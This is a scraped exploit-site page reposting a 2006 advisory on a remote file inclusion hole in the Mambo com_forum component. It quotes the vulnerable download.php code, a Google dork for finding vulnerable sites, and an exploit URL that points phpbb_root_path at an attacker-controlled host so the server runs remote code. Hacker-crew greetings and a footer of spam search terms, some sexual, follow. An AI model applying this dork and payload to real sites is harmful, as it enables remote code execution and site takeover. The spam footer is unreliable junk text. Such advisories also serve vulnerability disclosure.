about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability




2006-07-09 com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download :
http://mamboxchange.com/frs/download.php/6873/phpbb_component1.2.4RC3.zip

bug found in file : download.php

define('IN_PHPBB', true);
//$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc ');
include($phpbb_root_path . 'common.'.$phpEx);


google dork: inurl:com_forum

http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[attacker]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha,
#papmahackerlink

securitydot.net - 2006-07-09

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 08:57:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
muoyuqilin Www.sex.co sexgirlvid www.finetr xi.xiaoyoy tsyouxi.cn Www.Arab-x SQuery.htm www.0571yi domai.com pictsnudeg 17tahun.Co allinurl: WWw.Girlse mov.tsyoux constants. www.taokez logo trisk sibel keki Linux 2.6. sxe zoo firefox 2. www.sf29.c www.shouji t767t Www pinkwo Move MWN SMTPD www.jz360. www.xiezhi e361 Photos Sex CMS is Fre Invision P Www.Sexoce www.indian syslog-ng CMS is Fre WWWSEX89 search/exp t473t web sense WWWSEX89 duplicate www.swkyj. SERTA t927t www.redief t476t www.sex.18